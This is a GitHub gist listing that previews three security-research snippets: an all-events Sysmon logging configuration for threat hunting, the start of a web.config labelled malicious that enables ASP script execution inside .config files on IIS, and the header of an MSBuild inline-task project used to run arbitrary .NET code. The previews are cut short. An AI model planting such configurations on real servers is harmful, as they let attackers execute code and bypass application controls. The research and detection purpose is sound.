Scott Sutherland nullbind
nullbind
/ allthesysmon.xml
Created
January 30, 2023 15:37
— forked from MHaggis/allthesysmon.xml
Hunt Naked
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Sysmon schemaversion="4.81"> | |
| <HashAlgorithms>md5,sha256</HashAlgorithms> | |
| <DnsLookup>False</DnsLookup> | |
| <CheckRevocation>False</CheckRevocation> | |
| <ArchiveDirectory>sysmon</ArchiveDirectory> | |
| <EventFiltering> | |
| <!--Event ID 1: Process creation--> | |
| <ProcessCreate onmatch="exclude"></ProcessCreate> | |
| <!--Event ID 2: A process changed a file creation time--> | |
| <FileCreateTime onmatch="exclude"></FileCreateTime> |
nullbind
/ downloader web.config
Created
July 7, 2022 20:51
— forked from gazcbm/downloader web.config
Malicious web.config's
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <configuration> | |
| <system.webServer> | |
| <handlers accessPolicy="Read, Script, Write"> | |
| <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
| </handlers> | |
| <security> | |
| <requestFiltering> | |
| <fileExtensions> | |
| <remove fileExtension=".config" /> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > | |
| <Target Name="Hello" > | |
| <!-- Call ANY .NET API --> | |
| <!-- | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |